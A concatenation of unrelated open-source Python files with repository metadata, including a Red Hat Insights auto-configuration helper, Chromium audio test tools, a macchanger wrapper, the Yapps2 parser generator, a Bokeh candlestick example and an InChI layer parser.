nparams=2, islinear=False)
def _get_predicted(self, p):
amp, age = p
zp = self.positional['zp']
diffus = self.model['diffus']
if self.model['mode'] == 'abrupt':
return abrupt(amp, age, zp, diffus)
if self.model['mode'] == 'linear':
return linear(amp, age, zp, diffus)
def _get_jacobian(self, p):
amp, age = p
zp = self.positional['zp']
diffus = self.model['diffus']
mode = self.model['mode']
if mode == 'abrupt':
tmp = zp / numpy.sqrt(4. * diffus * age)
jac = numpy.transpose([
abrupt(1., age, zp, diffus),
(amp * tmp * numpy.exp(-(tmp ** 2)) /
(numpy.sqrt(numpy.pi) * age))])
if mode == 'linear':
delta = 0.5
at_p = linear(amp, age, zp, diffus)
jac = numpy.transpose([
linear(1., age, zp, diffus),
(linear(amp, age + delta, zp, diffus) -
linear(amp, age - delta, zp, diffus)) / (2 * delta)])
return jac
|
eusoubrasileiro/fatiando_seismic
|
fatiando/geothermal/climsig.py
|
Python
|
bsd-3-clause
| 7,793 | 0 |
"""
Auto Configuration Helper
"""
import logging
import os
import requests
from urlparse import urlparse
from constants import InsightsConstants as constants
from cert_auth import rhsmCertificate
from connection import InsightsConnection
from config import CONFIG as config
logger = logging.getLogger(__name__)
APP_NAME = constants.app_name
def verify_connectivity():
"""
Verify connectivity to satellite server
"""
logger.debug("Verifying Connectivity")
ic = InsightsConnection()
try:
branch_info = ic.branch_info()
except requests.ConnectionError as e:
logger.debug(e)
logger.debug("Failed to connect to satellite")
return False
except LookupError as e:
logger.debug(e)
logger.debug("Failed to parse response from satellite")
return False
try:
remote_leaf = branch_info['remote_leaf']
return remote_leaf
except LookupError as e:
logger.debug(e)
logger.debug("Failed to find accurate branch_info")
return False
def set_auto_configuration(hostname, ca_cert, proxy):
"""
Set config based on discovered data
"""
logger.debug("Attempting to auto configure!")
logger.debug("Attempting to auto configure hostname: %s", hostname)
logger.debug("Attempting to auto configure CA cert: %s", ca_cert)
logger.debug("Attempting to auto configure proxy: %s", proxy)
saved_base_url = config['base_url']
if ca_cert is not None:
saved_cert_verify = config['cert_verify']
config['cert_verify'] = ca_cert
if proxy is not None:
saved_proxy = config['proxy']
config['proxy'] = proxy
config['base_url'] = hostname + '/r/insights'
if not verify_connectivity():
logger.warn("Could not auto configure, falling back to static config")
logger.warn("See %s for additional information",
constants.default_log_file)
config['base_url'] = saved_base_url
if proxy is not None:
if saved_proxy is not None and saved_proxy.lower() == 'none':
saved_proxy = None
config['proxy'] = saved_proxy
if ca_cert is not None:
config['cert_verify'] = saved_cert_verify
def _try_satellite6_configuration():
"""
Try to autoconfigure for Satellite 6
"""
try:
from rhsm.config import initConfig
rhsm_config = initConfig()
logger.debug('Trying to autoconf Satellite 6')
cert = file(rhsmCertificate.certpath(), 'r').read()
key = file(rhsmCertificate.keypath(), 'r').read()
rhsm = rhsmCertificate(key, cert)
# This will throw an exception if we are not registered
logger.debug('Checking if system is subscription-manager registered')
rhsm.getConsumerId()
logger.debug('System is subscription-manager registered')
rhsm_hostname = rhsm_config.get('server', 'hostname')
rhsm_hostport = rhsm_config.get('server', 'port')
rhsm_proxy_hostname = rhsm_config.get('server', 'proxy_hostname').strip()
rhsm_proxy_port = rhsm_config.get('server', 'proxy_port').strip()
rhsm_proxy_user = rhsm_config.get('server', 'proxy_user').strip()
rhsm_proxy_pass = rhsm_config.get('server', 'proxy_password').strip()
proxy = None
if rhsm_proxy_hostname != "":
logger.debug("Found rhsm_proxy_hostname %s", rhsm_proxy_hostname)
proxy = "http://"
if rhsm_proxy_user != "" and rhsm_proxy_pass != "":
logger.debug("Found user and password for rhsm_proxy")
proxy = proxy + rhsm_proxy_user + ":" + rhsm_proxy_pass + "@"
proxy = proxy + rhsm_proxy_hostname + ':' + rhsm_proxy_port
logger.debug("RHSM Proxy: %s", proxy)
logger.debug("Found Satellite Server Host: %s, Port: %s",
rhsm_hostname, rhsm_hostport)
rhsm_ca = rhsm_config.get('rhsm', 'repo_ca_cert')
logger.debug("Found CA: %s", rhsm_ca)
logger.debug("Setting authmethod to CERT")
config['authmethod'] = 'CERT'
# Directly connected to Red Hat, use cert auth directly with the api
if (rhsm_hostname == 'subscription.rhn.redhat.com' or
rhsm_hostname == 'subscription.rhsm.redhat.com'):
logger.debug("Connected to Red Hat Directly, using cert-api")
rhsm_hostname = 'cert-api.access.redhat.com'
rhsm_ca = None
else:
# Set the host path
# 'rhsm_hostname' should really be named ~ 'rhsm_host_base_url'
rhsm_hostname = rhsm_hostname + ':' + rhsm_hostport + '/redhat_access'
logger.debug("Trying to set auto_configuration")
set_auto_configuration(rhsm_hostname, rhsm_ca, proxy)
return True
except Exception as e:
logger.debug(e)
logger.debug('System is NOT subscription-manager registered')
return False
def _read_systemid_file(path):
with open(path, "r") as systemid:
data = systemid.read().replace('\n', '')
return data
def _try_satellite5_configuration():
"""
Attempt to determine Satellite 5 Configuration
"""
logger.debug("Trying Satellite 5 auto_config")
rhn_config = '/etc/sysconfig/rhn/up2date'
systemid = '/etc/sysconfig/rhn/systemid'
if os.path.isfile(rhn_config):
if os.path.isfile(systemid):
config['systemid'] = _read_systemid_file(systemid)
else:
logger.debug("Could not find Satellite 5 systemid file.")
return False
logger.debug("Found Satellite 5 Config")
rhn_conf_file = file(rhn_config, 'r')
hostname = None
for line in rhn_conf_file:
if line.startswith('serverURL='):
url = urlparse(line.split('=')[1])
hostname = url.netloc + '/redhat_access'
logger.debug("Found hostname %s", hostname)
if line.startswith('sslCACert='):
rhn_ca = line.strip().split('=')[1]
# Auto discover proxy stuff
if line.startswith('enableProxy='):
proxy_enabled = line.strip().split('=')[1]
if line.startswith('httpProxy='):
proxy_host_port = line.strip().split('=')[1]
if line.startswith('proxyUser='):
proxy_user = line.strip().split('=')[1]
if line.startswith('proxyPassword='):
proxy_password = line.strip().split('=')[1]
if hostname:
proxy = None
if proxy_enabled == "1":
proxy = "http://"
if proxy_user != "" and proxy_password != "":
logger.debug("Found user and password for rhn_proxy")
proxy = proxy + proxy_user + ':' + proxy_password
proxy = proxy + "@" + proxy_host_port
else:
proxy = proxy + proxy_host_port
logger.debug("RHN Proxy: %s", proxy)
set_auto_configuration(hostname, rhn_ca, proxy)
else:
logger.debug("Could not find hostname")
return False
return True
else:
logger.debug("Could not find rhn config")
return False
def try_auto_configuration():
"""
Try to auto-configure if we are attached to a sat5/6
"""
if config['auto_config'] and not config['offline']:
if not _try_satellite6_configuration():
_try_satellite5_configuration()
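# For reference, the up2date lines parsed above look roughly like this
# (hypothetical values):
#
#   serverURL=https://satellite.example.com/XMLRPC
#   sslCACert=/usr/share/rhn/RHN-ORG-TRUSTED-SSL-CERT
#   enableProxy=1
#   httpProxy=proxy.example.com:3128
#   proxyUser=
#   proxyPassword=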
|
wcmitchell/insights-core
|
insights/client/auto_config.py
|
Python
|
apache-2.0
| 7,561 | 0.000265 |
import cmd
import json
import termcolor
from struct_manager import createEmptyCommandGroup, createEmptyStruct, createEmptyCommand
from populator import populateDict
class EditorShell ( cmd.Cmd ) :
def __init__ ( self, file ) :
cmd.Cmd.__init__(self)
self.file = file
# self.struct = json.load ( self.file )
try :
self.struct = json.load ( self.file )
except :
print "[!] Can't open the JSON file, creating a new struct"
self.struct = createEmptyStruct()
self.cur_node = self.struct
def do_add( self, line ) :
if not line :
return
line = line.strip()
toks = line.split()
ident = toks[0].lower()
if 'command' == ident :
self.do_add_command( ' '.join( toks [1:] ) )
pass # add command
elif 'group' == ident :
self.do_add_group( ' '.join( toks [1:] ) )
pass # add command
elif 'dependency' == ident :
pass # add command
else :
print " '%s' not available subcommand!" % ident
def do_add_group( self, line ) :
if not line :
print "Need a 'name' "
return
line = line.strip()
toks = line.split()
codename, group = createEmptyCommandGroup( toks[0] )
populateDict(group)
print group
self.struct['CommandGroups'][ codename ] = group
def do_add_command( self, line ) :
if not line :
print "Need a 'group code name' "
return
line = line.strip()
toks = line.split()
codename = toks[0]
unique, command = createEmptyCommand( )
populateDict( command )
self.struct['CommandGroups'][ codename ]['Commands'][ unique ] = command
print "Command '%s' created!" % unique
def do_add_dependency( self, line ) :
pass
def do_show_command( self, line ) :
pass
def do_edit_command( self, line ) :
if not line :
print "Need a 'command identifier' "
return
line = line.strip()
toks = line.split()
ident = toks[0]
        comm = None
        for gname, group in self.struct['CommandGroups'].iteritems() :
            try :
                comm = group['Commands'][ident]
                break
            except KeyError :
                pass
        if not comm :
            print "Identifier '%s' doesn't exist" % ident
            return
        populateDict( comm, False )
def do_edit_group( self, line ) :
if not line :
print "Need a 'command identifier' "
return
line = line.strip()
toks = line.split()
gname = toks[0]
        group = self.struct['CommandGroups'].get( gname )
        if not group :
            print "Group '%s' doesn't exist" % gname
            return
        populateDict( group )
def do_list( self, line ) :
for group in self.struct['CommandGroups'].keys() :
print group
def do_list_commands( self, line ) :
for gname, group in self.struct['CommandGroups'].iteritems() :
print "=========== %s ===========" % group['name']
for k, v in group['Commands'].iteritems() :
print '''{0:24} -| {1:<64}\n-> {2:<64}
'''.format( k, v['command'].encode('utf8'), v['description'].encode('utf8') )
print "=========== --- ==========="
print
def do_save( self, line ) :
self.file.seek(0)
self.file.write( json.dumps( self.struct, indent = 1 ) + '\n' )
self.file.truncate()
def do_create_dependency( self, line ) :
if not line :
print "Need a 'name' "
return
line = line.strip()
toks = line.split()
dep = toks[0]
self.struct['DependencyTokens'].append( dep )
def do_d_list( self, line ) :
for group in self.struct.keys() :
print group
def do_d_show( self, line ) :
print json.dumps( self.struct, indent = 1 )
|
operatorequals/gatheros
|
gatheros/editor/cmd_interface.py
|
Python
|
bsd-3-clause
| 3,370 | 0.07092 |
import networkx as nx
class Roadmap(nx.Graph):
def __init__(self, gd, max_dist, *args, **kwargs):
self.gd = gd
self.max_dist = max_dist
nx.Graph.__init__(self, *args, **kwargs)
def insert(self, sample):
self.gd.insert(sample)
for smpl in self.gd.get_nearest(sample):
if smpl == sample:
continue
if smpl.dist_to(sample) <= self.max_dist:
self.add_edge(smpl, sample)
def make(*args, **kwargs):
return Roadmap(*args, **kwargs)
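# A minimal usage sketch (assuming `gd` is any spatial index exposing
# insert(sample) and get_nearest(sample), and that samples provide dist_to()):
#
#   rm = make(gd, max_dist=1.0)
#   for sample in samples:
#       rm.insert(sample)
#   path = nx.shortest_path(rm, start, goal)   # plain networkx call on the graph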
|
wallarelvo/racer
|
racer/roadmap.py
|
Python
|
apache-2.0
| 539 | 0 |
#!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Audio tools for recording and analyzing audio.
The audio tools provided here are mainly to:
- record playing audio.
- remove silence from beginning and end of audio file.
- compare audio files using PESQ tool.
The tools are supported on Windows and Linux.
"""
import commands
import ctypes
import logging
import os
import re
import subprocess
import sys
import threading
import time
import pyauto_media
import pyauto
_TOOLS_PATH = os.path.abspath(os.path.join(pyauto.PyUITest.DataDir(),
'pyauto_private', 'media', 'tools'))
WINDOWS = 'win32' in sys.platform
if WINDOWS:
_PESQ_PATH = os.path.join(_TOOLS_PATH, 'pesq.exe')
_SOX_PATH = os.path.join(_TOOLS_PATH, 'sox.exe')
_AUDIO_RECORDER = r'SoundRecorder.exe'
else:
_PESQ_PATH = os.path.join(_TOOLS_PATH, 'pesq')
_SOX_PATH = commands.getoutput('which sox')
_AUDIO_RECORDER = commands.getoutput('which arecord')
_PACMD_PATH = commands.getoutput('which pacmd')
class AudioRecorderThread(threading.Thread):
"""A thread that records audio out of the default audio output."""
def __init__(self, duration, output_file, record_mono=False):
threading.Thread.__init__(self)
self.error = ''
self._duration = duration
self._output_file = output_file
self._record_mono = record_mono
def run(self):
"""Starts audio recording."""
if WINDOWS:
if self._record_mono:
raise Exception("Mono recording not supported on Windows yet!")
duration = time.strftime('%H:%M:%S', time.gmtime(self._duration))
cmd = [_AUDIO_RECORDER, '/FILE', self._output_file, '/DURATION',
duration]
# This is needed to run SoundRecorder.exe on Win-64 using Python-32 bit.
ctypes.windll.kernel32.Wow64DisableWow64FsRedirection(
ctypes.byref(ctypes.c_long()))
else:
num_channels = 1 if self._record_mono else 2
cmd = [_AUDIO_RECORDER, '-d', self._duration, '-f', 'dat', '-c',
str(num_channels), self._output_file]
cmd = [str(s) for s in cmd]
logging.debug('Running command: %s', ' '.join(cmd))
returncode = subprocess.call(cmd, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
if returncode != 0:
self.error = 'Failed to record audio.'
else:
logging.debug('Finished recording audio into %s.', self._output_file)
def RunPESQ(audio_file_ref, audio_file_test, sample_rate=16000):
"""Runs PESQ to compare audio test file to a reference audio file.
Args:
audio_file_ref: The reference audio file used by PESQ.
audio_file_test: The audio test file to compare.
sample_rate: Sample rate used by PESQ algorithm, possible values are only
8000 or 16000.
Returns:
    A tuple of two floats, the raw MOS and MOS-LQO scores reported by PESQ, or
    None if the PESQ output could not be parsed.
"""
# Work around a bug in PESQ when the ref file path is > 128 chars. PESQ will
# compute an incorrect score then (!), and the relative path to the ref file
# should be a lot shorter than the absolute one.
audio_file_ref = os.path.relpath(audio_file_ref)
cmd = [_PESQ_PATH, '+%d' % sample_rate, audio_file_ref, audio_file_test]
logging.debug('Running command: %s', ' '.join(cmd))
p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output, error = p.communicate()
if p.returncode != 0:
logging.error('Error running pesq: %s\n%s', output, error)
# Last line of PESQ output shows the results. Example:
# P.862 Prediction (Raw MOS, MOS-LQO): = 4.180 4.319
result = re.search('Prediction.*= (\d{1}\.\d{3})\t(\d{1}\.\d{3})',
output)
if not result or len(result.groups()) != 2:
return None
return (float(result.group(1)), float(result.group(2)))
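# A minimal usage sketch (hypothetical file names; both files are expected to be
# WAV recordings at the chosen sample rate):
#
#   scores = RunPESQ('reference.wav', 'recording.wav', sample_rate=16000)
#   if scores:
#     raw_mos, mos_lqo = scores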
def RemoveSilence(input_audio_file, output_audio_file):
"""Removes silence from beginning and end of the input_audio_file.
Args:
input_audio_file: The audio file to remove silence from.
output_audio_file: The audio file to save the output audio.
"""
# SOX documentation for silence command: http://sox.sourceforge.net/sox.html
# To remove the silence from both beginning and end of the audio file, we call
# sox silence command twice: once on normal file and again on its reverse,
# then we reverse the final output.
# Silence parameters are (in sequence):
# ABOVE_PERIODS: The period for which silence occurs. Value 1 is used for
# silence at beginning of audio.
# DURATION: the amount of time in seconds that non-silence must be detected
# before sox stops trimming audio.
  # THRESHOLD: value used to indicate what sample value is treated as silence.
ABOVE_PERIODS = '1'
DURATION = '2'
THRESHOLD = '5%'
cmd = [_SOX_PATH, input_audio_file, output_audio_file, 'silence',
ABOVE_PERIODS, DURATION, THRESHOLD, 'reverse', 'silence',
ABOVE_PERIODS, DURATION, THRESHOLD, 'reverse']
logging.debug('Running command: %s', ' '.join(cmd))
p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output, error = p.communicate()
if p.returncode != 0:
logging.error('Error removing silence from audio: %s\n%s', output, error)
def ForceMicrophoneVolumeTo100Percent():
if WINDOWS:
logging.error('Volume forcing not implemented on Windows yet.')
else:
# The recording device id is machine-specific. We assume here it is called
# Monitor of render (which corresponds to the id render.monitor). You can
# list the available recording devices with pacmd list-sources.
RECORDING_DEVICE_ID = 'render.monitor'
HUNDRED_PERCENT_VOLUME = '65536'
cmd = [_PACMD_PATH, 'set-source-volume', RECORDING_DEVICE_ID,
HUNDRED_PERCENT_VOLUME]
logging.debug('Running command: %s', ' '.join(cmd))
p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output, error = p.communicate()
if p.returncode != 0:
logging.error('Error forcing mic volume to 100%%: %s\n%s', output, error)
|
loopCM/chromium
|
chrome/test/functional/media/audio_tools.py
|
Python
|
bsd-3-clause
| 6,222 | 0.010125 |
#!/usr/bin/python
# -*- encoding: utf-8 -*-
###########################################################################
# Module Written to OpenERP, Open Source Management Solution
# Copyright (C) OpenERP Venezuela (<http://openerp.com.ve>).
# All Rights Reserved
###############Credits######################################################
# Coded by: Humberto Arocha <hbto@vauxoo.com>
# María Gabriela Quilarque <gabriela@vauxoo.com>
# Javier Duran <javier@vauxoo.com>
# Planified by: Nhomar Hernandez
# Finance by: Helados Gilda, C.A. http://heladosgilda.com.ve
# Audited by: Humberto Arocha humberto@openerp.com.ve
#############################################################################
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
##############################################################################
import model
import report
import wizard
#import edi
|
thinkasoft/ProyectoRD-dev
|
l10n_ve_withholding_islr/__init__.py
|
Python
|
agpl-3.0
| 1,587 | 0.002522 |
from math import pi
import pandas as pd
from bokeh.sampledata.stocks import MSFT
from bokeh.plotting import *
df = pd.DataFrame(MSFT)[:50]
df['date'] = pd.to_datetime(df['date'])
mids = (df.open + df.close)/2
spans = abs(df.close-df.open)
inc = df.close > df.open
dec = df.open > df.close
w = 12*60*60*1000 # half day in ms
output_cloud("candlestick")
figure(x_axis_type = "datetime", tools="pan,wheel_zoom,box_zoom,reset,previewsave",
width=1000, name="candlestick")
hold()
segment(df.date, df.high, df.date, df.low, color='black')
rect(df.date[inc], mids[inc], w, spans[inc], fill_color="#D5E1DD", line_color="black")
rect(df.date[dec], mids[dec], w, spans[dec], fill_color="#F2583E", line_color="black")
curplot().title = "MSFT Candlestick"
xaxis().major_label_orientation = pi/4
grid().grid_line_alpha=0.3
# open a browser
show()
|
sahat/bokeh
|
examples/plotting/cloud/candlestick.py
|
Python
|
bsd-3-clause
| 853 | 0.009379 |
from __future__ import absolute_import, division, print_function
import os
class Config(object):
""" Default configuration """
DEBUG = False
APPR_URI = os.getenv('APPR_URI', "http://localhost:5000")
class ProductionConfig(Config):
""" Production configuration """
APPR_URI = "http://localhost:5000"
APPR_BACKEND = 'false'
class DevelopmentConfig(Config):
""" Development configuration """
DEBUG = True
# APPR_URI = 'https://api.appr.sh'
APPR_URI = os.getenv('APPR_URI', "http://localhost:5000")
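# A minimal sketch of how these classes might be selected (hypothetical wiring;
# the real selection logic lives elsewhere in the project):
#
#   import os
#   config_cls = DevelopmentConfig if os.getenv('APPR_ENV') == 'dev' else ProductionConfig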
|
cn-app-registry/cnr-server
|
appr/api/config.py
|
Python
|
apache-2.0
| 545 | 0 |
# Module: macchanger.py
# Description: Wrapper for the Linux macchanger utility.
# Author: Nick Sanzotta/@Beamr
# Version: v 1.09252017
try:
import os, sys, time
from subprocess import Popen, PIPE
from theme import *
except Exception as e:
	print('\n [!] MACCHANGE - Error: %s' % (e))
sys.exit(1)
def macRandom(interface):
wirelessInt = str(interface.get_ifname())
p1 = Popen(["ifconfig " + wirelessInt + " | grep -o -E '([[:xdigit:]]{1,2}:){5}[[:xdigit:]]{1,2}'"], shell=True, stdout=PIPE)
print(normal('i') + 'Current MAC Address: %s' % (p1.communicate()[0].rstrip('\n')))
os.system('ifconfig ' + wirelessInt + ' down')
os.system('macchanger -r ' + wirelessInt + ' > /dev/null')
os.system('ifconfig ' + wirelessInt + ' up')
p2 = Popen(["ifconfig " + wirelessInt + " | grep -o -E '([[:xdigit:]]{1,2}:){5}[[:xdigit:]]{1,2}'"], shell=True, stdout=PIPE)
print(blue('*') + 'New MAC Address: %s' % (p2.communicate()[0].rstrip('\n')))
def macManual(interface, macaddress):
wirelessInt = str(interface.get_ifname())
p1 = Popen(["ifconfig " + wirelessInt + " | grep -o -E '([[:xdigit:]]{1,2}:){5}[[:xdigit:]]{1,2}'"], shell=True, stdout=PIPE)
print(normal('i') + 'Current MAC Address: %s' % (p1.communicate()[0].rstrip('\n')))
os.system('ifconfig ' + wirelessInt + ' down')
os.system('macchanger -m ' + macaddress + ' ' + wirelessInt + ' > /dev/null')
os.system('ifconfig ' + wirelessInt + ' up')
p2 = Popen(["ifconfig " + wirelessInt + " | grep -o -E '([[:xdigit:]]{1,2}:){5}[[:xdigit:]]{1,2}'"], shell=True, stdout=PIPE)
print(blue('*') + 'New MAC Address: %s' % (p2.communicate()[0].rstrip('\n')))
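# Usage sketch (illustrative only, not part of the module): both helpers expect
# an object exposing get_ifname(); the interface wrapper named below is a
# hypothetical stand-in for whatever object the caller already has.
#
#   iface = SomeInterfaceWrapper('wlan0')    # hypothetical wrapper with get_ifname()
#   macRandom(iface)                         # randomize the MAC via `macchanger -r`
#   macManual(iface, '00:11:22:33:44:55')    # set a specific MAC via `macchanger -m`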
|
NickSanzotta/WiFiSuite
|
wifisuite/helpers/macchange.py
|
Python
|
mit
| 1,617 | 0.019171 |
#!/usr/bin/env python2
#
# Yapps 2 - yet another python parser system
# Copyright 1999-2003 by Amit J. Patel <amitp@cs.stanford.edu>
#
# This version of Yapps 2 can be distributed under the
# terms of the MIT open source license, either found in the LICENSE file
# included with the Yapps distribution
# <http://theory.stanford.edu/~amitp/yapps/> or at
# <http://www.opensource.org/licenses/mit-license.php>
#
import sys, re
from yapps import runtime, parsetree
def generate(inputfilename, outputfilename='', dump=0, **flags):
"""Generate a grammar, given an input filename (X.g)
and an output filename (defaulting to X.py)."""
if not outputfilename:
if inputfilename.endswith('.g'):
outputfilename = inputfilename[:-2] + '.py'
else:
raise Exception('Must specify output filename if input filename is not *.g')
DIVIDER = '\n%%\n' # This pattern separates the pre/post parsers
preparser, postparser = None, None # Code before and after the parser desc
# Read the entire file
s = open(inputfilename,'r').read()
# See if there's a separation between the pre-parser and parser
f = s.find(DIVIDER)
if f >= 0: preparser, s = s[:f]+'\n\n', s[f+len(DIVIDER):]
# See if there's a separation between the parser and post-parser
f = s.find(DIVIDER)
if f >= 0: s, postparser = s[:f], '\n\n'+s[f+len(DIVIDER):]
# Create the parser and scanner and parse the text
scanner = grammar.ParserDescriptionScanner(s, filename=inputfilename)
if preparser: scanner.del_line += preparser.count('\n')
parser = grammar.ParserDescription(scanner)
t = runtime.wrap_error_reporter(parser, 'Parser')
if t is None: return 1 # Failure
if preparser is not None: t.preparser = preparser
if postparser is not None: t.postparser = postparser
# Check the options
for f in t.options.keys():
for opt,_,_ in yapps_options:
if f == opt: break
else:
print >>sys.stderr, 'Warning: unrecognized option', f
# Add command line options to the set
for f in flags.keys(): t.options[f] = flags[f]
# Generate the output
if dump:
t.dump_information()
else:
t.output = open(outputfilename, 'w')
t.generate_output()
return 0
if __name__ == '__main__':
import doctest
doctest.testmod(sys.modules['__main__'])
doctest.testmod(parsetree)
# Someday I will use optparse, but Python 2.3 is too new at the moment.
yapps_options = [
('context-insensitive-scanner',
'context-insensitive-scanner',
'Scan all tokens (see docs)'),
]
import getopt
optlist, args = getopt.getopt(sys.argv[1:], 'f:', ['help', 'dump', 'use-devel-grammar'])
if not args or len(args) > 2:
print >>sys.stderr, 'Usage:'
print >>sys.stderr, ' python', sys.argv[0], '[flags] input.g [output.py]'
print >>sys.stderr, 'Flags:'
print >>sys.stderr, (' --dump' + ' '*40)[:35] + 'Dump out grammar information'
print >>sys.stderr, (' --use-devel-grammar' + ' '*40)[:35] + 'Use the devel grammar parser from yapps_grammar.py instead of the stable grammar from grammar.py'
for flag, _, doc in yapps_options:
print >>sys.stderr, (' -f' + flag + ' '*40)[:35] + doc
else:
# Read in the options and create a list of flags
flags = {}
use_devel_grammar = 0
for opt in optlist:
for flag, name, _ in yapps_options:
if opt == ('-f', flag):
flags[name] = 1
break
else:
if opt == ('--dump', ''):
flags['dump'] = 1
elif opt == ('--use-devel-grammar', ''):
use_devel_grammar = 1
else:
print >>sys.stderr, 'Warning: unrecognized option', opt[0], opt[1]
if use_devel_grammar:
import yapps_grammar as grammar
else:
from yapps import grammar
sys.exit(generate(*tuple(args), **flags))
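# Illustrative sketch (not part of Yapps itself): generate() above expects a *.g
# file whose optional pre-parser and post-parser sections are separated from the
# grammar description by lines containing only "%%" (the DIVIDER defined above):
#
#   ... python code copied verbatim before the generated parser ...
#   %%
#   ... grammar description handed to grammar.ParserDescription ...
#   %%
#   ... python code copied verbatim after the generated parser ...
#
# A typical call is then simply:
#
#   generate('calc.g')    # writes calc.py next to the grammar file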
|
swesterfeld/beast
|
yapps2_deb/yapps2.py
|
Python
|
lgpl-2.1
| 4,135 | 0.006288 |
import re
from collections import namedtuple
# this is almost a validating expression, it could certainly be simpler by just using [^/]* inside the groups
chargeDef = r"(/q[\-\+0-9;\*mMnNi]*)?"
protonationDef = r"(/p[\-\+0-9,;]*)?"
isotopeDef = r"(/i[\-\+0-9,;HDT]*(?:/h[0-9HDT]+)*)?"
stereoBondDef=r"(/b[\-\+0-9,\?\*;mNnNi]*)?"
stereoTetDef=r"(/t[\-\+0-9,\?;\*mMnNi]*)?"
stereoMDef=r"(/m[\-\+0-9,;\.]*)?"
stereoSDef=r"(/s[\-\+0-9,;]*)?"
inchiLayers=(
r"(InChI=1S?)",
r"(/[a-zA-Z0-9\.]*)", # formula
r"(/c[0-9\(\)\-\,\*;]*)?", # skeleton
r"(/h[0-9,\-\Hh\*\(\);]*)?", # hydrogens
chargeDef, # charge
protonationDef, # protonation
stereoBondDef, # stereo_bond
stereoTetDef, #stereo_tet
stereoMDef, #stereo_m
stereoSDef, #stereo_s
isotopeDef, #isotope
stereoBondDef, #isotope_stereo_bond
stereoTetDef, #isotope_stereo_tet
stereoMDef, #isotope_stereo_m
stereoSDef, #isotope_stereo_s
r"(/f[a-zA-Z0-9\.]*(?:/h[0-9,\-\Hh\*\(\);]*)?)?", # fixed_h
chargeDef, # fixedh_charge
protonationDef, # fixedh_protonation
stereoBondDef, #fixedh_stereo_bond
stereoTetDef, #fixedh_stereo_tet
stereoMDef, #fixedh_stereo_m
stereoSDef, #fixedh_stereo_s
isotopeDef, #fixedh_isotope
stereoBondDef, #fixedh_isotope_stereo_bond
stereoTetDef, #fixedh_isotope_stereo_tet
stereoMDef, #fixedh_isotope_stereo_m
stereoSDef, #fixedh_isotope_stereo_s
r"(/o[\(\)0-9,]*)?", # transposition
r"(/r.*)?", # reconnected_main # <- FIX: we punt on this
)
coreExpr=re.compile(''.join(inchiLayers))
Layers=namedtuple("Layers",['start','formula','skeleton','hydrogens',
# pos 4
'charge','protonation',
# pos 6
'stereo_bond','stereo_tet','stereo_m','stereo_s',
# pos 10
'isotope','isotope_stereo_bond','isotope_stereo_tet','isotope_stereo_m','isotope_stereo_s',
# pos 15
'fixedh','fixedh_charge','fixedh_protonation',
# pos 18
'fixedh_stereo_bond','fixedh_stereo_tet','fixedh_stereo_m','fixedh_stereo_s',
# pos 22
'fixedh_isotope','fixedh_isotope_stereo_bond','fixedh_isotope_stereo_tet','fixedh_isotope_stereo_m','fixedh_isotope_stereo_s',
# pos 27
'transposition',
'reconnected_main'
])
layerGroups = {
'main':tuple(range(4)),
'charge':tuple(range(4,6)),
'stereo':tuple(range(6,10)),
'isotope':tuple(range(10,15)),
'fixedh':tuple(range(15,27)),
}
def formulaGrouping(tpl):
return (tpl[0],tpl[1],)
def mainGrouping(tpl):
return (tpl[x] for x in layerGroups['main'])
def chargeGrouping(tpl):
return (tpl[x] for x in layerGroups['main']+layerGroups['charge'])
def stereoGrouping(tpl):
return (tpl[x] for x in layerGroups['main']+layerGroups['charge']+layerGroups['stereo'])
def isotopeGrouping(tpl):
return (tpl[x] for x in layerGroups['main']+layerGroups['charge']+layerGroups['isotope'][0:1])
def isotopestereoGrouping(tpl):
return (tpl[x] for x in layerGroups['main']+layerGroups['charge']+layerGroups['isotope'])
def stereo_isotopeGrouping(tpl):
return (tpl[x] for x in layerGroups['main']+layerGroups['charge']+layerGroups['stereo']+layerGroups['isotope'][0:1])
def stereo_isotopestereoGrouping(tpl):
return (tpl[x] for x in layerGroups['main']+layerGroups['charge']+layerGroups['stereo']+layerGroups['isotope'])
def extractLayers(inchi):
"""
>>> tpl=extractLayers('InChI=1S/C16H20N4O3/c1-9(21)19-15(18-4)20-13-11-7-10(8-17)5-6-12(11)23-16(2,3)14(13)22/h5-7,13-14,22H,1-4H3,(H2,18,19,20,21)/t13?,14-/m0/s1')
>>> tpl.start
'InChI=1S'
>>> tpl.formula
'C16H20N4O3'
>>> tpl.skeleton
'c1-9(21)19-15(18-4)20-13-11-7-10(8-17)5-6-12(11)23-16(2,3)14(13)22'
>>> tpl.hydrogens
'h5-7,13-14,22H,1-4H3,(H2,18,19,20,21)'
>>> tpl.charge
''
>>> tpl.protonation
''
>>> tpl.stereo_bond
''
>>> tpl.stereo_tet
't13?,14-'
>>> tpl.stereo_m
'm0'
>>> tpl.stereo_s
's1'
>>> tpl.isotope
''
>>> tpl.fixedh
''
Charge layers:
From [O-]CCCC[NH3+]
>>> tpl = extractLayers('InChI=1S/C4H10NO/c5-3-1-2-4-6/h1-5H2/q-1/p+1')
>>> tpl.charge
'q-1'
>>> tpl.protonation
'p+1'
Stereochemistry:
From [O-][C@H](Cl)/C=C/C=C(/CC(O)=N)CC(=O)N
>>> tpl = extractLayers('InChI=1S/C9H12ClN2O3/c10-7(13)3-1-2-6(4-8(11)14)5-9(12)15/h1-3,7H,4-5H2,(H2,11,14)(H2,12,15)/q-1/b3-1+/t7-/m0/s1')
>>> tpl.stereo_bond
'b3-1+'
>>> tpl.stereo_tet
't7-'
>>> tpl.stereo_m
'm0'
>>> tpl.stereo_s
's1'
Isotopes:
From: [13CH3]O
>>> tpl = extractLayers('InChI=1S/CH4O/c1-2/h2H,1H3/i1+1')
>>> tpl.isotope
'i1+1'
>>> tpl.isotope_stereo_tet
''
Isotope + stereo
From: [13CH3]O[C@H](C)O
